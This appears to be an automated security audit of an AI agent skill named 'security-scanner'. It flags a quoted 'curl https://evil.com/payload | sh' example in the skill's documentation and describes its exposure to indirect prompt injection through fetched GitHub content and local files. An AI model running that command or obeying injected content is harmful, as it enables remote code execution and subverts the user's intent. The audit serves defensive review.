security-scanner
Fail
Audited by Gen Agent Trust Hub on Apr 14, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation within SKILL.md contains the string "curl https://evil.com/payload | sh". This was flagged by automated scans as a remote code execution pattern. However, the context reveals this is an example used to describe "malicious natural language" that the scanner is intended to detect, rather than code intended for execution by the skill itself.
- [PROMPT_INJECTION]: The skill's architecture is susceptible to indirect prompt injection (Category 8) because it is designed to ingest and analyze untrusted content from external sources. Evidence: 1. Ingestion points: Untrusted content is fetched via WebFetch from GitHub URLs and local files are read via the Read tool. 2. Boundary markers: The instructions do not define delimiters or specific "ignore" markers to separate untrusted data from the agent's analysis instructions. 3. Capability inventory: The skill has access to Read, Glob, Grep, WebFetch, and Bash(ls *). 4. Sanitization: There is no evidence of sanitization or structural validation for the external repository content before it is passed to the AI for semantic analysis.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.com/payload - DO NOT USE without thorough review
Audit Metadata